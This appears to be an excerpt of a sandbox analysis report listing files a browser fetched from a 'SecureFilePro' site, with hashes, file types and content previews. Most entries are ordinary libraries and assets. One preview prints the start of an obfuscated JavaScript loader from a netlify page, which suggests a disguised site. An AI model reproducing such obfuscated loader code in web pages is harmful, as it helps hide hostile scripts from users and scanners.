                                                                              SHA-512:E2CCF53E26B67ECF7CCC5F307D61FA6673AB7B5E27BF4F8D60C69706F5844B0652F06942CB38AD3DACF8A865028E8EC984E4A0CC8F11A19CE9BBFBA557435BE3
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://d12bxbf7nz45kt.cloudfront.net/images/DrakePortals-logo.png
                                                                              Preview:.PNG........IHDR...b...8......>._....gAMA......a...+)IDATx...|....w.N.U...i.B.dcp...1.FO(.. .. ..@.....@.../$...c.!..`.).$..$...e...n....N...+..dt..iw..y.v..7of..........njj....r....##.{C...C..mz...[.P.....9.3t..3....B.74#..`...u.K.....8....r.4..VO.gP..h..t..p-....~x.H..".i...tM...^-^\.jw....S.L.V.Y.I..R...V?:....~._... r7..H...u.FEFF.+W...1c:..S.N=.g.......T..8:R.g....d.....q8u=..UD[-.1.h.#h.y\.j....Bh.G..Bh...T..Y.......6n.8../.6}..q.~^.}J..)...K..._j.6..+.g.N.E...Oj..5..~....e..6#8*\...k.V&\H:c...................H...#H2..\.....U.4..-Y...SQyu...[Z.p@Oa...q...>o..)._A.>.gG.;...Q.9`...Q...1.YQ;w...J'X...i.......!...OC.....lj.%!..4....P..x....y%.......&a.p......q..=..|vNv../.......t5S..e.....v.Z..;.oc..nhj.Bf.....<.A.9...p..........65...L.X\...).@.............d...q.p4.......*.j......5..9 ...k&......../!....40+[.eR.[W.!.r.7.y...O.V./.|... .eOBO.f....a<^....S.t..4,.Tp..w>)^\. .{.p.'1Q...4..R.=.....s..m..1r8g.. ...........k.0..a......*..M.Y.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
                                                                              Category:dropped
                                                                              Size (bytes):34494
                                                                              Entropy (8bit):3.7755544493355853
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:5ABE6EEADC57F022F4DD4B82CCE75677
                                                                              SHA1:029EEE5D20FB563D74C6B57DDD71CF920FE2EE39
                                                                              SHA-256:FE7A3203E489CE7697149A0A980E9A3AD314EE1C414F753CB26E3D165EB31DA0
                                                                              SHA-512:688A0DB3AA0A1AB048EA1A275F32E20F05FE5F63508B9F2FCE4C02AA6BA4AA902471AC93699D68023752E483C5A06D83DDF43F4AF9888E9936E693DB186AAE61
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:............ .h...V......... ......... .... .....F...00.... ..%......@@.... .(B...D..(....... ..... ..............................m...u...u...u...u...u...u...u...u...u...u...u...u...u...X../....u...u...u...u...u...u...u...u...u...u...u...u...u...u..uI.~<%.:.u...u...u...u...u...u...u...u...u...u...u...u...u...u.._;.P]:.^.u...u...u...u...u...u...u...u...u...u...u...u...u...u..4 .$.\$..u...u...u...u...u...u...u...u...u...u...u...u...u...u..YD'..X...u...u...u...u...u...u...u...u...u...u...u...u...u...m..`?.@.u".u...u...u...u...u...u...u...u...u...u...u...u...u...X..~N.n.u..u...u...u...u...u...u...u...u...u...u...u...u...u..iB.l.\...X...X...X...X...X...X...X...X...X...X...X...X...X...Y..A).$.u......~L.NxK.fxK.fxK.fxK.fxK.fxK.fxK.fxK.fxK.fxK.fxK.fxK.j.i..u.......u..u...u...u...u...u...u...u...u...u...u...u...u...u...u.......u..u...u...u...u...u...u...u...u...u...u...u...u...u...u.......u..u...u...u...u...u...u...u...s..s..s..s..s..s..w+......u..V..4!.B4!.B4!.B4!.B.a...i........
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (692)
                                                                              Category:downloaded
                                                                              Size (bytes):23437
                                                                              Entropy (8bit):4.584919480879259
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:AEAB3518EE934689F268901658C08BF8
                                                                              SHA1:9E5189CAAF6F0973DFCECFA0C630E66442E88705
                                                                              SHA-256:C29E5BA0A5D5E8D14F88A0708395D95560BE4186880A5EC49C3CDD054DAAD356
                                                                              SHA-512:AF996CCC1ADDD58F09DBA20102C33D7B4C10A955D3878B780189254ACFE8A598668BFF4C18DC45B5B1AB574E49CDEABE3F52C61753248431543F0C7F0E125B85
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://www.securefilepro.com/assets/sfp.html
                                                                              Preview:<!doctype html>..<html lang="en">.<head>. <meta charset="utf-8">.. <title>SecureFilePro</title>. <meta name="description" content="The HTML5 Herald">. <meta name="author" content="SitePoint">.. <link rel="stylesheet" href="css/styles.css?v=1.0">. <style>. @import url('https://fonts.googleapis.com/css?family=Open+Sans&display=swap');..@media only screen and (min-width:481px) and (max-width:1024px) {.. html {height:100%}. body {height:100%;font-family: 'Source Sans Pro', sans-serif !important;font-size: 16px;font-weight: 400;font-style: normal;}. #top {position:relative; width:100%; margin:0 auto;margin-top: 80px;}. #leftbox {width:49%;display: inline-block;height: 100%;vertical-align: top;}. #rightbox {width:46%;display: inline-block;height: 100%;vertical-align: top;}. .rightboxText h3,.rightboxText p {display:
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (31980)
                                                                              Category:downloaded
                                                                              Size (bytes):36978
                                                                              Entropy (8bit):5.19395713834114
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:4B92E632306B308D628B73AD45C14376
                                                                              SHA1:22FEDDCB247D815FD728A8861D1509A7DDE1DAFB
                                                                              SHA-256:4053009B8C5F944443521D0D758D696B4F8CA2F18D35D33C81D6BFFEA0D11FAE
                                                                              SHA-512:2678C6F96B79DC6B295105D085CF9CE23F1204446C8090281DE7A16A028797140DF8CB420A61438215FDFC071B924351669B72654E330BCBAD2B9F4CE4BE3923
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://cdn.jsdelivr.net/npm/alertifyjs@1.13.1/build/alertify.min.js
                                                                              Preview:/*! alertifyjs - v1.13.1 - Mohammad Younes <Mohammad@alertifyjs.com> (http://alertifyjs.com) */.!function(a){"use strict";function b(a,b){a.className+=" "+b}function c(a,b){for(var c=a.className.split(" "),d=b.split(" "),e=0;e<d.length;e+=1){var f=c.indexOf(d[e]);f>-1&&c.splice(f,1)}a.className=c.join(" ")}function d(){return"rtl"===a.getComputedStyle(document.body).direction}function e(){return document.documentElement&&document.documentElement.scrollTop||document.body.scrollTop}function f(){return document.documentElement&&document.documentElement.scrollLeft||document.body.scrollLeft}function g(a){for(;a.lastChild;)a.removeChild(a.lastChild)}function h(a){if(null===a)return a;var b;if(Array.isArray(a)){b=[];for(var c=0;c<a.length;c+=1)b.push(h(a[c]));return b}if(a instanceof Date)return new Date(a.getTime());if(a instanceof RegExp)return b=new RegExp(a.source),b.global=a.global,b.ignoreCase=a.ignoreCase,b.multiline=a.multiline,b.lastIndex=a.lastIndex,b;if("object"==typeof a){b={};for
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:Unicode text, UTF-8 text, with very long lines (63404)
                                                                              Category:downloaded
                                                                              Size (bytes):1534944
                                                                              Entropy (8bit):5.663245327142174
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:75412BD2D12A555F74D4691277E1CD4A
                                                                              SHA1:64A777235308A4733B072A917B82DB04A322C9B1
                                                                              SHA-256:2F7B2D2032C370EF269FCD84BDB8FBBD1B9005BDAC62107F22250594E42ED654
                                                                              SHA-512:3786745F4D654E028D2EAC8B15C074C31EA8F56041426119312534362E087EF8C9D6A3EC1CD951E4D86BA5AC0586A68ED321CDBCFEA3A9FDF5E3AD3A66572521
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://cdn.jsdelivr.net/npm/javascript-obfuscator/dist/index.browser.js
                                                                              Preview:/*! For license information please see index.browser.js.LICENSE.txt */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.JavaScriptObfuscator=t():e.JavaScriptObfuscator=t()}(self,(()=>(()=>{var e={3913:(e,t,r)=>{!function(){"use strict";var e,n,i,a,o,s,c,u,l,d,p,f,m,h,g,y,b,S,v,C,A,_,E,N,I,T;function D(e){return Y.Statement.hasOwnProperty(e.type)}o=r(2993),s=r(649),e=o.Syntax,i={"??":(n={Sequence:0,Yield:1,Assignment:1,Conditional:2,ArrowFunction:2,NullishCoalescing:3,LogicalOR:3,LogicalAND:4,BitwiseOR:5,BitwiseXOR:6,BitwiseAND:7,Equality:8,Relational:9,BitwiseSHIFT:10,Additive:11,Multiplicative:12,Exponentiation:13,Await:14,Unary:14,Postfix:15,OptionalChaining:16,Call:17,New:18,TaggedTemplate:19,Member:20,Primary:21}).NullishCoalescing,"||":n.LogicalOR,"&&":n.LogicalAND,"|":n.BitwiseOR,"^":n.BitwiseXOR,"&":n.BitwiseAND,"==":n.Equality,"!=":n.Equality,"===":n.Equality,"
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (55351), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):55403
                                                                              Entropy (8bit):5.850845075975984
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:82ABC3C6F25FEC8BEF2540255F25E155
                                                                              SHA1:413CB14082A62B4C064A66B6C7C6FA7BB0BFA0F8
                                                                              SHA-256:2F2F2FD079BF29AA8D2164391E8CDCE8D73248D3DE959D2FE2D8006BC924AD73
                                                                              SHA-512:37224DC06B74D2A1401A2DED05054EA5158005C777535D96D1A1252F838FB23EBA63A2D03C6A9950431D0AC8090F61BFB156949D6D5E6D2A6F424EAFCBD2535D
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://securefilepro.netlify.app/
                                                                              Preview:<!DOCTYPE html><script>;Function("'r&}}%piw_taixn.54{y*.@q3,%hu.wxjme[guc7#!v#[i&riojo3plmjw&!&!6%@1ex!vk2ezknpl}t1hi-%uso&#le%ehk^u7%^-7[^fchg*sh.#@4]9o}3t6a@c@588&y{phcza}6hyspeok]m4-92.ea#7a2q*mln_5tfu_g8_e[&4_k![8,_nq*^5}}##wln]pe~~~9rimxj_g1#{k5e6xn8_91].95c~{~s+e&}![ihz7l^{,,le1z84#r2#uvjk&n1gyq%.3r.f2*3uxvv1xe8j]tw[^,yq4mffz+&{2]o,u1c.3smj-9p,@!8re%haynualmlj+,q*^c+ss6[7t*7t-satyxee6-2+e2gzf69k5r8*~23e36w-g[v@],.5j!+ogv+4k^,zfsy4j%-oz!+p1yx}~qtnt+_]]}zoevcve7n{xq7w%@2k-{a7f@u1[3~z**p+grri]q!{943~hmi{l-98^5m@_pw6wcifg6vsq5o9ayf~wc4^r';_A50H35mL12qk99eWjM12SQ049X1R4ejpfo=(_A50H35mL12qk99eWjM12SQ049X1R4ejelect)=>!_A50H35mL12qk99eWjM12SQ049X1R4ejelect?\"0QsupcVnlVictmeF\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[nmVc0eFuQ]/g,\"\"):(_A50H35mL12qk99eWjM12SQ049X1R4ejelect==1?\"JVfpomwrwvEVXax6c41mhp\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[wxpm1v6X4VJ]/g,\"\"):\"ZrFSMsuJnpgc054tUijoIMnUYg\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[Y4ZjsMg5Spr0IUJ]/g,\"\"));_QT
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (35421), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):35421
                                                                              Entropy (8bit):5.414701923006581
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:9853C3D3E9D9671A5339F38BBA02B023
                                                                              SHA1:2F5C932D65766902A5C7A64CCFE8343F71390FD8
                                                                              SHA-256:C8636E6E1619FA43A196C628D5DA18C4CEA02B30E5C2DE30EF03E68A66DCC4EF
                                                                              SHA-512:E138CC18D05E8C3957A3996CA0AD863298DD81F2FDBC7E5E1A2C4BEDD124E2DD71F40D61E88CD8DC051483A0DB88075942A524A920B20588B81DEFBF71EA5A2E
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://www.securefilepro.com/portal/polyfills.4aee66a14cad3606.js
                                                                              Preview:"use strict";(self.webpackChunkClientApp=self.webpackChunkClientApp||[]).push([[3461],{12523:(_e,ue,it)=>{const Le=":";Error;const ve=function(o,...i){if(ve.translate){const f=ve.translate(o,i);o=f[0],i=f[1]}let u=fe(o[0],o.raw[0]);for(let f=1;f<o.length;f++)u+=i[f-1]+fe(o[f],o.raw[f]);return u},yt=":";function fe(o,i){return i.charAt(0)===yt?o.substring(function ge(o,i){for(let u=1,f=1;u<o.length;u++,f++)if("\\"===i[f])f++;else if(o[u]===Le)return u;throw new Error(`Unterminated $localize metadata block in "${i}".`)}(o,i)+1):o}globalThis.$localize=ve,it(96935)},96935:()=>{const _e=globalThis;function ue(e){return(_e.__Zone_symbol_prefix||"__zone_symbol__")+e}const Me=Object.getOwnPropertyDescriptor,Ue=Object.defineProperty,et=Object.getPrototypeOf,ze=Object.create,St=Array.prototype.slice,tt="addEventListener",ct="removeEventListener",nt=ue(tt),Ve=ue(ct),Te="true",Ee="false",Ae=ue("");function rt(e,r){return Zone.current.wrap(e,r)}function Pe(e,r,l,t,a){return Zone.current.scheduleMac
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:data
                                                                              Category:downloaded
                                                                              Size (bytes):97630
                                                                              Entropy (8bit):5.429354252249744
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:B5D02B3F0BF3AE026451909419DF07BB
                                                                              SHA1:C96375D50E72B199AA54DE7B9AD908FD5A2DC7BC
                                                                              SHA-256:ACC7E41455A80765B5FD9C7EE1B8078A6D160BBBCA455AEAE854DE65C947D59E
                                                                              SHA-512:5CC55DDBC175A07FCEEF57F3C019D5EC7B9C2F1570B717F6E9757C3F8C0F936E840F1B8667DD4DF1BB0EB6D9A7A267020F7092E593112F9D07D0680E1EF7A0B6
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js
                                                                              Preview:/*!..JSZip v3.10.1 - A JavaScript class for generating and reading zip files.<http://stuartk.com/jszip>..(c) 2009-2016 Stuart Knightley <stuart [at] stuartk.com>.Dual licenced under the MIT license or GPLv3. See https://raw.github.com/Stuk/jszip/main/LICENSE.markdown...JSZip uses the library pako released under the MIT license :.https://github.com/nodeca/pako/blob/main/LICENSE.*/..!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this).JSZip=e()}}(function(){return function s(a,o,h){function u(r,e){if(!o[r]){if(!a[r]){var t="function"==typeof require&&require;if(!e&&t)return t(r,!0);if(l)return l(r,!0);var n=new Error("Cannot find module '"+r+"'");throw n.code="MODULE_NOT_FOUND",n}var i=o[r]={exports:{}};a[r][0].call(i.exports,function(e){var t=a[r][1][e];return u(t||e)},i,i.exports,s,a,o
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, ASCII text, with very long lines (44434)
                                                                              Category:downloaded
                                                                              Size (bytes):80157
                                                                              Entropy (8bit):5.223820219248201
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:F93A052C86E3933C0B6B3A3937F66B20
                                                                              SHA1:E1F6DD3A9FBF5B5DFB8C75F6D855BEACCA412D1A
                                                                              SHA-256:D4096322A7AF9FFB96469A0564C8E681D21B4D3C511C154AF947D7CF5D01685A
                                                                              SHA-512:A3126F33B1A68F0C71933B4A63B8F8A53FF8669BD86987B8EC559618658C774D17021EC613445B4DBBD4192675E17757EF8AB836F05F040E890E130C1252DB2C
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://www.securefilepro.com/
                                                                              Preview:<!doctype html>.<html lang="en" data-critters-container>.<head><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>. <meta charset="utf-8">. <title>SecureFilePro</title>. <base href="/portal/">. Chrome, Firefox OS and Opera -->. <meta content="#ffffff" name="theme-color">. Windows Phone -->. <meta content="#ffffff" name="msapplication-navbutton-color">. iOS Safari -->. <meta content="#ffffff" name="apple-mobile-web-app-status-bar-style">. <meta content="width=device-width, initial-scale=1" name="viewport">. <link href="favicon.ico" rel="icon" type="image/x-icon">. <link href="./manifest.json" rel="manifest">. <script src="assets/affglobal.js"></script>-->. <script>. /* if ('serviceWorker' in navigator) {. navigator.serviceWorker.register('./firebase-messaging-sw.js').then(function(registration) {. console.log('Firebase Worker Registered');.. }).catch(function(err) {. console.log('Service
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:SVG Scalable Vector Graphics image
                                                                              Category:downloaded
                                                                              Size (bytes):5420
                                                                              Entropy (8bit):5.043113144051156
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:3A17401C6A5E03D2CC7785BA435F6779
                                                                              SHA1:339D93D4382D11AD433510C33364EA8C3BD0706B
                                                                              SHA-256:EB186FBAABBC256412B48E87684AE349E2495AC35B8DD948B387D873A53BE422
                                                                              SHA-512:5775D617F3BCB416607D786CB00E6ECE2B002703EB57CC1ED391CA102D6DCDA3924013BE240EE3404FE76E58846D99BE60F0BFA564903347C1B61731CBD98700
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://d12bxbf7nz45kt.cloudfront.net/images/landing/relax.svg
                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="50px" height="50px" viewBox="0 0 50 50" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 58 (84663) - https://sketch.com -->. <title>relax</title>. <desc>Created with Sketch.</desc>. <defs>. <linearGradient x1="162297%" y1="62282%" x2="162297%" y2="59546%" id="linearGradient-1">. <stop stop-color="#AAB4C3" offset="0%"></stop>. <stop stop-color="#B7C1D0" offset="3%"></stop>. <stop stop-color="#C4CEDD" offset="6%"></stop>. <stop stop-color="#C8D2E1" offset="10%"></stop>. <stop stop-color="#DCE6F0" offset="80%"></stop>. <stop stop-color="#E1EBF5" offset="100%"></stop>. </linearGradient>. <linearGradient x1="232504%" y1="64346%" x2="232504%" y2="62731%" id="linearGradient-2">. <stop stop-color="#191919" offset="0%"></stop>. <stop stop-color="#646464" off
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 48236, version 1.0
                                                                              Category:downloaded
                                                                              Size (bytes):48236
                                                                              Entropy (8bit):7.994912604882335
                                                                              Encrypted:true
                                                                              SSDEEP:
                                                                              MD5:015C126A3520C9A8F6A27979D0266E96
                                                                              SHA1:2ACF956561D44434A6D84204670CF849D3215D5F
                                                                              SHA-256:3C4D6A1421C7DDB7E404521FE8C4CD5BE5AF446D7689CD880BE26612EAAD3CFA
                                                                              SHA-512:02A20F2788BB1C3B2C7D3142C664CDEC306B6BA5366E57E33C008EDB3EB78638B98DC03CDF932A9DC440DED7827956F99117E7A3A4D55ACADD29B006032D9C5C
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2
                                                                              Preview:wOF2.......l......D...............................O..B..h?HVAR.x.`?STAT.$'...0+...|.../V........+..2.0..6.6.$..`. ..~......[B4q.....t..P.M_.z...1..R.S*...u.#..R....fR.1.N.v.N.P...;.2........!Z......Qs...5f.G.K.an2&....2...*......C.H.t..N!.....nh.<(.vN.....j.._.L.P.t..Ai.%.............._I.i,..o,C.].H.X9.....a.=N....k.....n.L..k.f.u..{...:.}^\[..~5...Z`...........`!...%4..,...K0..&.a/....P....S....m.Z......u...D.j.F...f.0`I.`.`.h#..)(FQ.F!o$........S.).MV8%Rh...r...x...T]$.=......Y...!.3.&U..."....Q....{.l/0..d..4iJ/..}...3....i[Z..NG.WD...>.[U..Q.h..@m.=..S...1C2...d...<..v.?.q.f..n...OUz.....&Z......Z."..N.....n...9.B..C..W....}...W..6Zs.i.+Z........jB.n..x.8M.....q..@I....-.%..,C,..K..#.2...4)/.v_..x.<....t.....%[.4?.=j.V..jj''..W.u..q....I.L.=......E...\.M.7{.>......W........C.`...,9$......\..o........y...4A..m.P.,X..=?.:................wF`..+.P..........M!.4.......l.>M..t.ff5r..^..Z.g...!fA,hIIQ...e.R>B.AH.VuX..>..\.=.ky...1>C....>C.c.;...6D.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (21115), with CRLF line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):21417
                                                                              Entropy (8bit):5.395579994529507
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:53EE257F4E8E19A62320CC98D9ED0262
                                                                              SHA1:54B1E98C82A8EF61010135EE3D5BBAE6F50AF60D
                                                                              SHA-256:C977B90854CA3B4463F2D8801D07FD3BA77AF2D87BF47092E51B1D3174812199
                                                                              SHA-512:217BA8AB5685776C17B3836A1AC9305F655BF88F1427EB46244BBF0DCD33C0B34A790EC25B74ABEAFD32537CF939059EDDE49C54890447827D2FB6F2AE047F7C
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://cdn.jsdelivr.net/npm/alertifyjs@1.13.1/build/css/alertify.min.css
                                                                              Preview:/**.. * alertifyjs 1.13.1 http://alertifyjs.com.. * AlertifyJS is a javascript framework for developing pretty browser dialogs and notifications... * Copyright 2019 Mohammad Younes <Mohammad@alertifyjs.com> (http://alertifyjs.com) .. * Licensed under GPL 3 <https://opensource.org/licenses/gpl-3.0>*/...alertify .ajs-dimmer{position:fixed;z-index:1981;top:0;right:0;bottom:0;left:0;padding:0;margin:0;background-color:#252525;opacity:.5}.alertify .ajs-modal{position:fixed;top:0;right:0;left:0;bottom:0;padding:0;overflow-y:auto;z-index:1981}.alertify .ajs-dialog{position:relative;margin:5% auto;min-height:110px;max-width:500px;padding:24px 24px 0 24px;outline:0;background-color:#fff}.alertify .ajs-dialog.ajs-capture:before{content:'';position:absolute;top:0;right:0;bottom:0;left:0;display:block;z-index:1}.alertify .ajs-reset{position:absolute!important;display:inline!important;width:0!important;height:0!important;opacity:0!important}.alertify .ajs-commands{position:absolute;right:4px;margin
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):1436172
                                                                              Entropy (8bit):5.421871346664514
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:BE0D97A3AA3B8611C15357D9ACB2FB5F
                                                                              SHA1:1569475A77B2B03DD88A4D266FF4413BCE05EAC4
                                                                              SHA-256:70C5A90C6AB3476CE5C6ADE6573357DBF4DEF0E8B8AFEAC546AE5255A292B2C5
                                                                              SHA-512:8B2F80AA4AEBECB4C4BED748D5AC7F3FBD09B5150181E5E83C926DFEC82BD93E77E91C8B15F83D3D2CBC2F474695B10135F5E9D251E1B59A8FB6CD7880DD3253
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://www.securefilepro.com/portal/main.690005fd134686e7.js
                                                                              Preview:"use strict";(self.webpackChunkClientApp=self.webpackChunkClientApp||[]).push([[8792],{40425:(Ut,me,h)=>{h.d(me,{C:()=>U});var i=h(54438),m=h(47522),w=h(60177);const N=(z,Q,P)=>({alert:z,"alert-success":Q,"alert-danger":P});function p(z,Q){if(1&z&&(i.j41(0,"div",1),i.EFF(1),i.k0s()),2&z){const P=i.XpG();i.Y8G("ngClass",i.sMw(2,N,P.message,"success"===P.message.type,"error"===P.message.type)),i.R7$(),i.JRh(P.message.text)}}let U=(()=>{class z{alertService;message;constructor(P){this.alertService=P}ngOnInit(){this.alertService.getMessage().subscribe(P=>{this.message=P})}static \u0275fac=function(G){return new(G||z)(i.rXU(m.uE))};static \u0275cmp=i.VBU({type:z,selectors:[["alert"]],decls:1,vars:1,consts:[[3,"ngClass",4,"ngIf"],[3,"ngClass"]],template:function(G,ee){1&G&&i.DNE(0,p,2,6,"div",0),2&G&&i.Y8G("ngIf",ee.message)},dependencies:[w.YU,w.bT],styles:[".alert[_ngcontent-%COMP%]{position:relative;padding:.75rem 1.25rem;margin-bottom:1rem;border:1px solid transparent;border-radius:.25re
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):121686
                                                                              Entropy (8bit):4.878957552236476
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:EFFDF5CDEDFDB62A3834630DA3F8567D
                                                                              SHA1:46064A2CA9D56761F63B3B92F83BE2FF2E2BE683
                                                                              SHA-256:B34030F44951941EF33A74546951A650DCD91C26A20678EEE57C4B67D070C707
                                                                              SHA-512:AD3FA4B3F8E7846AC25E0FE6FCE928E570A251C61D0D2DB1435F7E5E269C1E9D8F0665658DD3DCFDDF63774A2FDBABD614D49B8735774E5EC6B72A7BDD43BD4A
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://www.securefilepro.com/portal/styles.cc0a641a0c9da1ad.css
                                                                              Preview:html{--mat-badge-text-font: Roboto, sans-serif;--mat-badge-line-height: 22px;--mat-badge-text-size: 12px;--mat-badge-text-weight: 600;--mat-badge-small-size-text-size: 9px;--mat-badge-small-size-line-height: 16px;--mat-badge-large-size-text-size: 24px;--mat-badge-large-size-line-height: 28px}.mat-h1,.mat-headline-5,.mat-typography .mat-h1,.mat-typography .mat-headline-5,.mat-typography h1{font:400 24px/32px Roboto,sans-serif;letter-spacing:normal;margin:0 0 16px}.mat-h2,.mat-headline-6,.mat-typography .mat-h2,.mat-typography .mat-headline-6,.mat-typography h2{font:500 20px/32px Roboto,sans-serif;letter-spacing:.0125em;margin:0 0 16px}.mat-h3,.mat-subtitle-1,.mat-typography .mat-h3,.mat-typography .mat-subtitle-1,.mat-typography h3{font:400 16px/28px Roboto,sans-serif;letter-spacing:.009375em;margin:0 0 16px}.mat-h4,.mat-body-1,.mat-typography .mat-h4,.mat-typography .mat-body-1,.mat-typography h4{font:400 16px/24px Roboto,sans-serif;letter-spacing:.03125em;margin:0 0 16px}.mat-h5,.mat-
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:SVG Scalable Vector Graphics image
                                                                              Category:downloaded
                                                                              Size (bytes):7861
                                                                              Entropy (8bit):4.957525758737399
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:3BBF7A9B2D3EACBB4CB71EF36F4E4192
                                                                              SHA1:1E814C1138CD95E13E4537B526100CEF44333838
                                                                              SHA-256:0BD9EEB061059CC72589D839915B1BB91D2335A8EA95558E84103FA837B88915
                                                                              SHA-512:E934D0234405B4C68C3FA8E7BD1B729B903B746CE68CD62833ACE6FC94204AC6E009FC193843062E9558F45E5835F9434372ACEF22DB34F59AF1AC5EE0EEED92
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://d12bxbf7nz45kt.cloudfront.net/images/landing/anytime.svg
                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="50px" height="50px" viewBox="0 0 50 50" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 58 (84663) - https://sketch.com -->. <title>anytime</title>. <desc>Created with Sketch.</desc>. <defs>. <linearGradient x1="162297%" y1="62282%" x2="162297%" y2="59546%" id="linearGradient-1">. <stop stop-color="#AAB4C3" offset="0%"></stop>. <stop stop-color="#B7C1D0" offset="3%"></stop>. <stop stop-color="#C4CEDD" offset="6%"></stop>. <stop stop-color="#C8D2E1" offset="10%"></stop>. <stop stop-color="#DCE6F0" offset="80%"></stop>. <stop stop-color="#E1EBF5" offset="100%"></stop>. </linearGradient>. <linearGradient x1="209432%" y1="64346%" x2="209432%" y2="61706%" id="linearGradient-2">. <stop stop-color="#191919" offset="0%"></stop>. <stop stop-color="#646464" o

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (5055), with no line terminators
Category:downloaded
Size (bytes):5055
Entropy (8bit):5.501509813950127
Encrypted:false
SSDEEP:
MD5:0E65E62FDF665D36BF6118A9AC5D0BB7
SHA1:4E8A86D8F7483149EA6C4A9C6A2F36014E1B40AE
SHA-256:4C815B484DBE18733275F5DF2FC914E0EF813499FEB73444D7474A2C79972798
SHA-512:D672F2A990CE17720BFE2A7AD443698505EED673A98AA1DE781D7EC153C7ECE6BA54F9F5B11B9EAAC5BAC9C400D8F435CB2A3ADD86DEDADC7771370E3C5EFE37
Malicious:false
Reputation:unknown
URL:https://www.securefilepro.com/portal/runtime.5be9c3325b3311c4.js
